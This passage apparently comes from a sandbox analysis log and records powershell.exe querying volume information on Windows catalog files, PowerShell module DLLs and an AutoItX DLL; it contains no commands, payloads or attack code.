Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.3448.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation